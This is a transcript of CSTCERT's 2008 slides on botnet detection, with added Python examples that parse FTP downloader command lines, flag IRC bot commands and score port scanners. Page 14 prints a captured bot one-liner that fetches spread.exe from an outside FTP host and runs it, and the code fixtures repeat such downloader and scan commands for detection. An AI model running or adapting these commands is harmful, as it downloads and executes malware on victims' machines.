China Science & Technology Network Computer Emergency Response Team: Botnet Detection and Network Security Alert. Tao JING, CSTCERT, CNIC, (+86)-010-58812898. CANS 2008, Indiana University, 2008-10-21. 21 pages.

TRANSCRIPT

Page 1: China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING jingtao@cstnet.cn CSTCERT,CNIC

China Science & Technology Network Computer Emergency Response Team

Botnet Detection and Network Security Alert

Tao JING
jingtao@cstnet.cn, CSTCERT, CNIC
(+86)-010-58812898

CANS 2008, Indiana University, 2008-10-21

Page 2:

Agenda

• About CSTCERT
• About Botnet
• Network Security Alert
• Future work

Page 3:

CSTCERT Overview

• Founded in 2002, CSTCERT (China Science and Technology Network Computer Emergency Response Team)
• CSTCERT is supervised by CSTNET.
• Services:
– Incident handling, including attacks, complaints, abnormal traffic detection and other related security incidents
– Research and development: emergency response
– Security training

Website: http://cert.cstnet.cn   Tel: +86-010-58812935   Email: [email protected]

Page 4:

Our work

• 2007.9 - 2008.9: we handled 266 security events.
– security incidents: 205
– security complaints: 61

Breakdown by type (pie chart): port scanning 55%, brute force 29%, phishing cheat 9%, SQL injection 5%, address probe 2%

Page 5:

The security status is very serious! Why?

• You can become a hacker very easily!
– You only need a little knowledge
– Hacking methods can be searched for on the Internet
– Many people share their hacking tools
– If you are willing to pay some money, someone will teach you hacking techniques

Page 6:

About Botnet

• A botnet is a collection of computers, connected to the Internet, that interact to accomplish some distributed task.
• Botnet typically refers to such a system designed and used for illegal purposes.
• The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'.

From: www.shadowserver.org

Page 7:

What can a botnet cause?

... and more.

Page 8:

How can we find a botnet?

• Active way:
– Network protocol analysis: IRC
– Monitor some special TCP ports (135/139/445/1433/22/2967 ...)
– Check C&C (Command and Control) server address updates from the Internet:
http://www.cyber-ta.org/
http://www.shadowserver.org

• Passive way:
– honeypot

Page 9:

Page 10:

Main characteristics of a botnet

• IRC messages
– Port scan: advscan, asc ...
– File download: download
– Others: PING/PONG, JOIN, MODE ...
• Scanned TCP ports: 135/139/445/1433/22/2967
• Vulnerabilities that botnets commonly exploit
– Weak passwords (SSH / MS-SQL / Windows)
– Overflow vulnerabilities (MS-SQL / Windows / other software)

Page 11:

How the host was controlled, method 1: sometimes the bot is driven with a scan control command

Page 12:

How the host was controlled, method 2: sometimes the bot installs additional malware

Page 13:

Page 14:

Captured command line and FTP session of the bot downloading spread.exe:

C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21>appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe
ftp> open spreadem.nowslate1703.info 21
Connected to spreadem.nowslate1703.info.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 73 of 200 allowed.
220-Local time is now 00:15. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
ftp> user spread baby
331 User spread OK. Password required
230-User spread has group access to: spread
230 OK. Current restricted directory is /
ftp> binary
200 TYPE is now 8-bit binary
ftp> get
Remote file spread.exe
Local file spread.exe
200 PORT command successful
150-Connecting to port 1555
150 83.1 kbytes to download
226-File successfully transferred
226 0.750 seconds (measured here), 110.70 Kbytes per second
ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 84 kbytes.
221 Logout.
C:\Documents and Settings\jackie>
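The captured one-liner above is the standard "echo an FTP script, run ftp -s:script, delete it, execute the payload" downloader that exploited hosts were made to run. As an added example (not code from the slides or from CSTCERT), the parser below recognises that shape in a process command line and pulls out the indicators an analyst wants: the FTP server and port, the credentials, the file fetched, and what is executed afterwards. The command line it runs on is constructed for the demo with the same structure as the captured one; the host, script name and helper names are assumptions. The same logic applies to command lines from process-creation logs.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample (assumption): same shape as the captured command line on the
# slide, with the FTP host and script file name changed.
SAMPLE_CMDLINE = (
    "cmd /c echo open ftp.example.invalid 21>appx.dll &echo user spread baby >>appx.dll "
    "&echo binary >>appx.dll &echo get >>appx.dll &echo spread.exe >>appx.dll "
    "&echo spread.exe >>appx.dll &echo bye >>appx.dll &ftp.exe -n -s:appx.dll "
    "&del appx.dll &spread.exe"
)

# Verbs ftp.exe accepts in a -s: script; anything else on its own line is an
# answer to a prompt (e.g. the remote/local file name after a bare "get").
FTP_COMMANDS = {"open", "user", "binary", "bin", "ascii", "get", "mget", "put",
                "send", "recv", "cd", "lcd", "prompt", "bye", "quit", "close"}

CMD_PREFIX_RE = re.compile(r"^cmd(?:\.exe)?\s+/c\s+", re.IGNORECASE)
ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.IGNORECASE)
FTP_RE = re.compile(r"\bftp(?:\.exe)?\b[^&]*?-s:(\S+)", re.IGNORECASE)


@dataclass
class FtpDownloader:
    script: str                      # name of the generated FTP script file
    host: Optional[str] = None       # FTP server the bot connects to
    port: int = 21
    user: Optional[str] = None
    password: Optional[str] = None
    files: List[str] = field(default_factory=list)     # files fetched with get
    executes: List[str] = field(default_factory=list)  # programs run afterwards


def split_statements(cmdline: str) -> List[str]:
    """Break a cmd.exe one-liner on & / && into its individual statements."""
    cmdline = CMD_PREFIX_RE.sub("", cmdline.strip())
    return [s.strip() for s in re.split(r"\s*&+\s*", cmdline) if s.strip()]


def parse_ftp_downloader(cmdline: str) -> Optional[FtpDownloader]:
    """Return the indicators if cmdline writes an FTP script and runs ftp -s:<script>, else None."""
    m = FTP_RE.search(cmdline)
    if not m:
        return None
    script = m.group(1)
    result = FtpDownloader(script=script)
    script_lines: List[str] = []
    for stmt in split_statements(cmdline):
        em = ECHO_RE.match(stmt)
        if em and em.group(2).lower() == script.lower():
            script_lines.append(em.group(1))   # a line of the FTP script
            continue
        low = stmt.lower()
        if low.startswith(("echo", "ftp", "del ")):
            continue
        result.executes.append(stmt)           # whatever is run after the download

    # Replay the script the way ftp.exe would read it.
    i = 0
    while i < len(script_lines):
        tokens = script_lines[i].split()
        i += 1
        if not tokens:
            continue
        cmd, args = tokens[0].lower(), tokens[1:]
        if cmd == "open" and args:
            result.host = args[0]
            if len(args) > 1 and args[1].isdigit():
                result.port = int(args[1])
        elif cmd == "user" and args:
            result.user = args[0]
            result.password = args[1] if len(args) > 1 else None
        elif cmd in ("get", "recv"):
            if args:
                result.files.append(args[0])
            else:
                # Bare "get": ftp.exe prompts for the remote name, then the local
                # name, so the next two script lines are answers, not commands.
                if i < len(script_lines):
                    result.files.append(script_lines[i].strip())
                    i += 1
                nxt = script_lines[i].split() if i < len(script_lines) else []
                if nxt and nxt[0].lower() not in FTP_COMMANDS:
                    i += 1
    return result


if __name__ == "__main__":
    print(parse_ftp_downloader(SAMPLE_CMDLINE))
```

A process-creation alert on "ftp" with "-s:" is already a strong signal; extracting the host and file name lets the server and payload be blocked and hunted for across other hosts.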

Page 15:

Network security alert - IDS/IPS rules

• For port scans: match some IRC message words: asc / advscan
• For network communication with IRC: PING/PONG, JOIN, PRIVMSG ...

Page 16:

Rules for IDS
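The IDS rules on these slides key on two things: the bot command words (advscan, asc, download) carried in IRC messages, and the IRC protocol verbs (PING/PONG, JOIN, PRIVMSG) themselves, which identify an IRC session on any port. As an added example (not the slides' rules and not CSTCERT's code), the following implements both checks over a constructed bot session: it parses each IRC line into prefix, command, parameters and trailing text, and flags PRIVMSG/NOTICE traffic whose first word is a known bot verb. The sample lines, channel and nick names, the command prefix characters and the verb table are assumptions for the demo.

```python
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed IRC session (assumption): a bot joins a channel and its operator
# issues the scan and download commands named on the slides.
SAMPLE_SESSION = [
    "NICK [USA|XP]1203948",
    "USER xp 0 0 :xp",
    ":irc.example.invalid 001 [USA|XP]1203948 :Welcome to the network",
    "JOIN #b0tz key123",
    ":op!op@host PRIVMSG #b0tz :.advscan lsass 100 5 0 -r -s",
    ":op!op@host PRIVMSG #b0tz :.asc dcom135 200 5 0 -b -r",
    "PING :irc.example.invalid",
    "PONG :irc.example.invalid",
    ":op!op@host PRIVMSG #b0tz :.download http://example.invalid/spread.exe c:\\spread.exe 1",
    ":friend!u@host PRIVMSG #chat :download finished, thanks",
]

# Bot verbs and their category; the scan/download words come from the slides.
BOT_COMMANDS = {
    "advscan": "scan", "asc": "scan", "scan": "scan",
    "download": "download", "dl": "download", "update": "download",
}
# Ordinary words that only count when carrying a bot prefix (".download", "!scan").
NEEDS_PREFIX = {"scan", "download", "update"}
PREFIX_CHARS = ".!-~$"


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]
    trailing: Optional[str]


@dataclass
class BotAlert:
    category: str            # "scan" or "download"
    command: str             # bot verb without its prefix character
    sender: Optional[str]    # nick of the controller
    target: Optional[str]    # channel or nick the command was sent to
    args: List[str]


def parse_irc_line(raw: str) -> Optional[IrcMessage]:
    """Split one IRC line into [:prefix] command params [:trailing]."""
    line = raw.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    tokens = line.split()
    if not tokens:
        return None
    return IrcMessage(prefix, tokens[0].upper(), tokens[1:], trailing)


def find_bot_commands(lines: List[str]) -> List[BotAlert]:
    """Flag messages whose first word is a bot command (the slides' asc/advscan rule)."""
    alerts: List[BotAlert] = []
    for raw in lines:
        msg = parse_irc_line(raw)
        if msg is None or msg.command not in ("PRIVMSG", "NOTICE", "TOPIC") or not msg.trailing:
            continue
        words = msg.trailing.split()
        if not words:
            continue
        first = words[0]
        verb = first.lstrip(PREFIX_CHARS).lower()
        category = BOT_COMMANDS.get(verb)
        if category is None:
            continue
        if verb in NEEDS_PREFIX and first[0] not in PREFIX_CHARS:
            continue  # plain chat word, not a command
        sender = msg.prefix.split("!", 1)[0] if msg.prefix else None
        target = msg.params[0] if msg.params else None
        alerts.append(BotAlert(category, verb, sender, target, words[1:]))
    return alerts


def irc_commands_seen(lines: List[str]) -> Set[str]:
    """IRC verbs present in the stream; JOIN/PRIVMSG/PING/PONG on an unusual port is itself a signal."""
    return {m.command for m in map(parse_irc_line, lines) if m is not None}


if __name__ == "__main__":
    for a in find_bot_commands(SAMPLE_SESSION):
        print(a)
    print(sorted(irc_commands_seen(SAMPLE_SESSION)))
```

The prefix requirement for generic words is the caveat a rule writer has to keep in mind: a content match on "download" or "scan" alone fires on ordinary chat, while "advscan" and "asc" are specific enough to match bare.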

Page 17:

Network security alert - Network traffic data analysis

• We can build a simple mathematical model that describes network traffic data by a numerical analysis method (the NTNA model).

For one destination port, with one row per source IP $i$:

$src\_ip$: the source IP that all the target IPs in a row share
$c_i$: count of this src_ip for this destination port
$c_{all}$: all of the counts for this destination port, $c_{all} = \sum_{i} c_i$
$n_i$: unique target IP amount of this src_ip for this destination port
$n_{all}$: all of the unique target IP amounts for this destination port, $n_{all} = \sum_{i} n_i$
$w_1, w_2$: weights for the degree of effect of each term
$p_i$: probability that we think this src_ip is scanning

$$p_i = \frac{c_i}{c_{all}}$$

$$p_i = w_1 \frac{c_i}{c_{all}} + w_2 \frac{n_i}{n_{all}}$$

Page 18:

Data of tcp 1433 scan, data of tcp 22 scan, data of other port scans ...

One table per destination port, one row per source IP:

  data of src ip   data of counts   amounts of target ip
  Src_ip1          Count_1          Dst_ipsum_1
  Src_ip2          Count_2          Dst_ipsum_2
  ...              ...              ...
  Src_ipn          Count_n          Dst_ipsum_n

Page 19:

NTNA model in practice
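The NTNA slides describe the pipeline end to end: monitor the scanned ports (135/139/445/1433/22/2967), build a per-port table of connection counts and unique-target counts per source IP, and score each source with $p_i = w_1 c_i/c_{all} + w_2 n_i/n_{all}$. As an added example (not CSTCERT's implementation), the code below runs that pipeline over a constructed set of flow records: the aggregation builds the per-port table, the scoring applies the weighted formula, and the threshold picks the suspected scanners. The flows, addresses, weights and threshold are assumptions; so is reading $n_{all}$ as the sum of the rows' $n_i$, which makes both terms shares in $[0, 1]$.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Constructed flow records (src_ip, dst_ip, dst_port); an assumption for the demo,
# not data from the slides. 10.0.0.5 sweeps tcp/1433 across 40 hosts, 10.0.0.9
# hits one tcp/22 host 30 times (a brute force, not a scan), the rest is noise.
SAMPLE_FLOWS: List[Tuple[str, str, int]] = (
    [("10.0.0.5", f"192.0.2.{i}", 1433) for i in range(1, 41)]
    + [("10.0.0.9", "192.0.2.7", 22)] * 30
    + [("10.0.0.2", "192.0.2.10", 1433), ("10.0.0.2", "192.0.2.11", 1433),
       ("10.0.0.3", "192.0.2.12", 22), ("10.0.0.3", "192.0.2.13", 22),
       ("10.0.0.4", "192.0.2.7", 22)]
)


@dataclass
class SrcStats:
    src_ip: str
    dst_port: int
    count: int          # c_i: connections from this src_ip to this port
    unique_dst: int     # n_i: distinct target IPs this src_ip touched on this port
    score: float = 0.0  # p_i


def aggregate(flows: Iterable[Tuple[str, str, int]]) -> Dict[int, List[SrcStats]]:
    """Build the per-port table of the slides: one row per src_ip with c_i and n_i."""
    counts: Dict[Tuple[int, str], int] = defaultdict(int)
    targets: Dict[Tuple[int, str], Set[str]] = defaultdict(set)
    for src, dst, port in flows:
        counts[(port, src)] += 1
        targets[(port, src)].add(dst)
    by_port: Dict[int, List[SrcStats]] = defaultdict(list)
    for (port, src), c in counts.items():
        by_port[port].append(SrcStats(src, port, c, len(targets[(port, src)])))
    return dict(by_port)


def ntna_scores(by_port: Dict[int, List[SrcStats]], w1: float = 0.3,
                w2: float = 0.7) -> Dict[int, List[SrcStats]]:
    """p_i = w1*c_i/c_all + w2*n_i/n_all per port; rows sorted by p_i descending.

    n_all is taken as the sum of the rows' n_i (assumption), so each term is a share.
    """
    for rows in by_port.values():
        c_all = sum(r.count for r in rows)
        n_all = sum(r.unique_dst for r in rows)
        for r in rows:
            r.score = w1 * r.count / c_all + w2 * r.unique_dst / n_all
        rows.sort(key=lambda r: r.score, reverse=True)
    return by_port


def suspected_scanners(flows: Iterable[Tuple[str, str, int]], threshold: float = 0.5,
                       w1: float = 0.3, w2: float = 0.7) -> List[Tuple[int, str]]:
    """(port, src_ip) pairs whose score reaches the threshold, sorted for stable output."""
    by_port = ntna_scores(aggregate(flows), w1, w2)
    return sorted((port, r.src_ip) for port, rows in by_port.items()
                  for r in rows if r.score >= threshold)


if __name__ == "__main__":
    for port, rows in sorted(ntna_scores(aggregate(SAMPLE_FLOWS)).items()):
        print(f"tcp/{port}")
        for r in rows:
            print(f"  {r.src_ip:<12} c_i={r.count:<4} n_i={r.unique_dst:<4} p_i={r.score:.3f}")
    print("suspected scanners:", suspected_scanners(SAMPLE_FLOWS))
```

The weights are where the "accuracy amendment" of the future-work slide lives: with $w_2$ dominant the ssh brute-forcer that hammers one host scores below threshold because its unique-target share is tiny, while with $w_1 = 1$ it is flagged alongside the real tcp/1433 sweep. Feeding the same aggregation from NetFlow records instead of packet captures is the netflow extension the slides mention.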

Page 20:

Future work

• Botnet research
• Monitoring and countermeasures for large-scale network worms
• Some improvements to the NTNA model
– accuracy amendment
– extension to larger-scale network traffic data (netflow)
– data mining

Page 21:

Thank you!

jingtao@cstnet.cn

(+86)-010-58812898